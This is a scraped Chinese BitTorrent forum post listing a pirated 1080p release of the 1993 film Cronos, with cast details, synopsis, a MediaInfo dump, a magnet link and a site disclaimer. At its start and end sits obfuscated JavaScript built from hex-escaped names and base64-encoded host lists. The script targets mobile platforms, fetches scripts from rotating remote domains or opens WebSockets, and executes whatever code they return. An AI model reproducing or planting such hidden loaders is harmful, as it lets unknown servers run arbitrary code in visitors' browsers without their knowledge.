魔鬼银爪[中文字幕].Cronos.1993.1080p.BluRay.DTS.x265-10bit 7.05GB

版主小s 1月前 143

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 魔鬼银爪

◎片 名 Cronos

◎年 代 1993

◎产 地 墨西哥

◎类 别 恐怖 / 奇幻

◎语 言 英语 / 西班牙语

◎上映日期 1993-11-05

◎IMDb链接 https://www.imdb.com/title/tt0104029/

◎豆瓣评分 6.4/10 (2655人评价)

◎豆瓣链接 https://movie.douban.com/subject/1306942/

◎片 长 94 分钟

◎导 演 吉尔莫·德尔·托罗 Guillermo del Toro (id:1027182)

◎编 剧 吉尔莫·德尔·托罗 Guillermo del Toro (id:1027182)

◎演 员 费德里科·路皮 Federico Luppi (id:1032480)

朗·普尔曼 Ron Perlman (id:1002688)

克劳迪奥·布鲁克 Claudio Brook (id:1076587)

玛加丽塔·伊莎贝尔 Margarita Isabel (id:1287391)

塔玛拉·沙纳特 Tamara Shanath (id:1362671)

丹尼尔·希梅内斯·卡乔 Daniel Giménez Cacho (id:1048359)

马里奥·伊万·马丁内斯 Mario Iván Martínez (id:1291192)

法尔内西奥·德贝尔纳尔 Farnesio de Bernal (id:1281980)

胡安·卡洛斯·科隆博 Juan Carlos Colombo (id:1281082)

豪尔赫·马丁内斯·德奥约斯 Jorge Martínez de Hoyos (id:1115664)

Adriana Olivera Adriana Olivera (id:1293549)

吉尔莫·德尔·托罗 Guillermo del Toro (id:1027182)

Luis de Icaza Luis de Icaza (id:1282005)

Laurencio Cordero Laurencio Cordero (id:1281268)

Francisco Murguía Francisco Murguía (id:1292736)

Bertha Navarro Bertha Navarro (id:1292945)

吉列尔莫·纳瓦罗 Guillermo Navarro (id:1292948)

塞巴斯蒂安·席尔瓦 Sebastián Silva (id:1297608)

◎标 签 墨西哥 / 恐怖 / 惊悚 / 吉尔莫·德尔·托罗 / 1993 / 奇幻 / 墨西哥电影 / CC

◎简 介

16世纪,一个无名的炼金师为求得永生,制造了名为“魔鬼银爪(Cronos)”的装置。它可延续人的生命,令其恢复青春活力,却也要求人类付出相应的代价。几经辗转,收藏着魔鬼银爪的雕像落入善良的古董商人耶稣·格里斯(Federico Luppi 饰)的手中。他偶然发现这个装置 及其隐藏的秘密,于是对其产生依赖,任凭魔鬼银爪将他变成为了青春而嗜血的怪物。另一方面,身体羸弱的富商安吉拉·迪拉·加迪亚(Ron Perlman 饰)得知魔鬼银爪在耶稣的手中,于是千方百计要将它弄到手,为此不惜大开杀戒……

本片为导演吉尔莫·德尔·托罗(Guillermo del Toro)的长片处女作,并荣获1993年墨西哥Ariel奖金奖和最佳男主角、最佳导演、最佳处女作、最佳原创故事、最佳制作、最佳编剧和最佳特效等多个奖项。

◎获奖情况 (共1项)

第46届戛纳电影节 (1993)

影评人周单元 梅赛德斯-奔驰大奖

└──吉尔莫·德尔·托罗 (id:1027182)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 246704986455423480175163869762181465489 (0xB999A6EF011397101412FC7EEC9D0591)

  4. Complete name : [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.05 GiB

  8. Duration : 1 h 32 min

  9. Overall bit rate : 10.9 Mb/s

  10. Movie name : Cronos 1993 1080p BluRay DTS [email protected]

  11. Encoded date : UTC 2021-11-01 23:59:57

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 32 min

  21. Bit rate : 9 384 kb/s

  22. Width : 1 920 pixels

  23. Height : 1 080 pixels

  24. Display aspect ratio : 16:9

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.189

  31. Stream size : 6.06 GiB (86%)

  32. Title : @HDSky

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 32 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 509 kb/s

  44. Channel(s) : 2 channels

  45. Channel layout : Lt Rt

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossy

  50. Stream size : 998 MiB (14%)

  51. Title : Spanish

  52. Language : Spanish

  53. Default : Yes

  54. Forced : No


  55. Text #1

  56. ID : 3

  57. Format : PGS

  58. Muxing mode : zlib

  59. Codec ID : S_HDMV/PGS

  60. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  61. Duration : 1 h 25 min

  62. Bit rate : 11.5 kb/s

  63. Count of elements : 753

  64. Stream size : 7.06 MiB (0%)

  65. Title : CHS

  66. Language : Chinese

  67. Default : Yes

  68. Forced : No


  69. Text #2

  70. ID : 4

  71. Format : PGS

  72. Muxing mode : zlib

  73. Codec ID : S_HDMV/PGS

  74. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration : 1 h 25 min

  76. Bit rate : 11.7 kb/s

  77. Count of elements : 753

  78. Stream size : 7.19 MiB (0%)

  79. Title : CHT

  80. Language : Chinese

  81. Default : No

  82. Forced : No


  83. Menu

  84. 00:00:00.000 : en:Chapter 01

  85. 00:03:50.814 : en:Chapter 02

  86. 00:06:34.311 : en:Chapter 03

  87. 00:10:30.421 : en:Chapter 04

  88. 00:14:16.230 : en:Chapter 05

  89. 00:16:53.888 : en:Chapter 06

  90. 00:20:15.297 : en:Chapter 07

  91. 00:29:34.439 : en:Chapter 08

  92. 00:34:38.326 : en:Chapter 09

  93. 00:38:35.855 : en:Chapter 10

  94. 00:40:43.775 : en:Chapter 11

  95. 00:45:48.496 : en:Chapter 12

  96. 00:51:46.186 : en:Chapter 13

  97. 00:53:49.101 : en:Chapter 14

  98. 00:55:47.636 : en:Chapter 15

  99. 00:59:57.552 : en:Chapter 16

  100. 01:04:54.140 : en:Chapter 17

  101. 01:06:48.254 : en:Chapter 18

  102. 01:08:13.631 : en:Chapter 19

  103. 01:14:30.800 : en:Chapter 20

  104. 01:18:00.301 : en:Chapter 21

  105. 01:21:01.440 : en:Chapter 22

  106. 01:26:45.742 : en:Chapter 23




复制代码


TAGS 奇幻 恐怖

磁力链:
  • magnet:?xt=urn:btih:A5B4163794BFCE306884BCCEEC3C1D805FE2D22C

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};